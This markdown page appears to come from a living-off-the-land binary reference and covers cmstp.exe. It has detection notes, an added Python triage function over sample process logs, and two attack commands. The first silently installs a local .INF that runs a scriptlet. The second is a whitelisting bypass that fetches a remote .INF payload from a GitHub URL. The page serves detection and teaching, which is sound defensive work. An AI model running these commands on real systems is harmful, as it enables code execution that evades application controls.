~/Privilege Escalation/Windows/Binaries# cat Cmstp.exe.md

Installs or removes a Connection Manager service profile.

Paths:

C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe

Detection:

Execution of cmstp.exe should not be normal unless a VPN is in use.
cmstp.exe communicating with the internet and retrieving files.
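The detection notes above, written as a triage function over process-creation records. This is an added example, not part of the original page. It assumes Sysmon Event ID 1 style fields (`Image`, `CommandLine`); the function name, finding labels and sample records are constructed for illustration.

```python
import re

# Locations the page lists for the legitimate binary (lower-cased for comparison).
EXPECTED_IMAGES = {
    r"c:\windows\system32\cmstp.exe",
    r"c:\windows\syswow64\cmstp.exe",
}

def triage_cmstp(event):
    """Return a sorted list of findings for one process-creation record.

    An empty list means the record is not a cmstp.exe launch.
    """
    image = event["Image"].lower()
    if image.rsplit("\\", 1)[-1] != "cmstp.exe":
        return []
    findings = {"cmstp-executed"}  # rare on hosts that do not use VPN profiles
    if image not in EXPECTED_IMAGES:
        findings.add("unexpected-image-path")
    # Split on whitespace but keep quoted paths together; drop argv[0].
    raw = re.findall(r'"[^"]*"|\S+', event["CommandLine"])
    tokens = [t.strip('"') for t in raw][1:]
    switches = {t.lower() for t in tokens if t.startswith("/")}
    targets = [t for t in tokens if not t.startswith("/")]
    if {"/s", "/ni"} <= switches:  # silent install, no desktop icon
        findings.add("silent-no-icon-install")
    if any(re.match(r"https?://", t, re.I) for t in targets):
        findings.add("remote-inf")  # profile fetched from a URL
    return sorted(findings)

SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /ni /s c:\cmstp\CorpVPN.inf"},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": "cmstp.exe /ni /s https://example.invalid/profile.inf"},
    {"Image": r"C:\Users\Public\cmstp.exe",
     "CommandLine": r'"C:\Users\Public\cmstp.exe" "C:\Users\Public\vpn profile.inf"'},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["CommandLine"], "->", triage_cmstp(ev))
```

Matching on the image file name misses a renamed copy of the binary; pair this with a network-connection rule for the second detection note.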

Execute

Silently installs a specially formatted local .INF file without creating a desktop icon. The .INF file contains an UnRegisterOCXSection section that executes a .SCT file using scrobj.dll.

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

AWL bypass

Silently installs a specially formatted remote .INF file without creating a desktop icon. The .INF file contains an UnRegisterOCXSection section that executes a .SCT file using scrobj.dll.

cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf